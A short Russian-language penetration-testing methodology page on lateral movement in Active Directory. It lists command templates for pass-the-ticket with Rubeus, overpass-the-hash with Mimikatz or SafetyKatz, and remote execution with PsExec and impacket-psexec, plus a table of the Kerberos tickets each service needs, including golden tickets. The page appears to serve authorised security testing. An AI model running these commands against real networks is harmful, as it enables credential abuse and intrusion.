Перейти к основному содержимому

Горизонтальное перемещение

:::tip Формат страницы

Порядок действий описан по‑русски. В методике сохранены заголовки (частично локализованы типовые термины), таблицы, иллюстрации и блоки кода: команды и параметры на английском, без перевода синтаксиса.

:::

Порядок действий

  1. Определите доступные каналы выхода и доверенные сегменты.
  2. Настройте туннели или ретрансляцию в соответствии с правилами теста.
  3. Проверяйте маршрут и стабильность сессии перед движением дальше.
  4. Синтаксис утилит в методике не меняется.

Методика

Pass The Ticket (PTT)

.\Rubeus.exe createnetonly /program:C:\Windows\System32\cmd.exe /domain:<DOMAIN> /username:<USERNAME> /password:FakePass123 /ticket:<TICKET>

Tickets - Techniques

Service TypeRequired Tickets
Windows File Share (PsExec)CIFS
LDAP Operations (DSync)LDAP
WinRM

HOST
HTTP
WINRM

WMI

HOST
RPCSS

Powershell Remoting

HOST
HTTP
Depending on OS:
WSMAN
RPCSS

Schedule TaksHost
Windows Remote Server Administration Tools

RPCSS
LDAP
CIFS

Golden Ticketskrbtgt

Overpass The Hash (OTH)

[.\Mimikatz.exe | .\SafetyKatz.exe ] "sekurlsa::pth /user:<USER2IMPERSONATE> /domain:<DOMAIN> [/ntlm:<HASH_NTLM>|/aes256:<AES256_KEY>|/rc4:<RC4_KEY>] /run:[cmd.exe | powershell.exe]" "exit"
# Alternative 1
.\PsExec.exe /accepteula [-s] \\<COMPUTER_NAME> <PROGRAM>
# Alternative 2
export KRB5CCNAME=<PATH_TICKET.ccache>
impacket-psexec -k -no-pass [[domain/]username@]<COMPUTER_NAME> -dc-ip <DC-IP> [-c <PROGRAM.EXE>]

Ссылки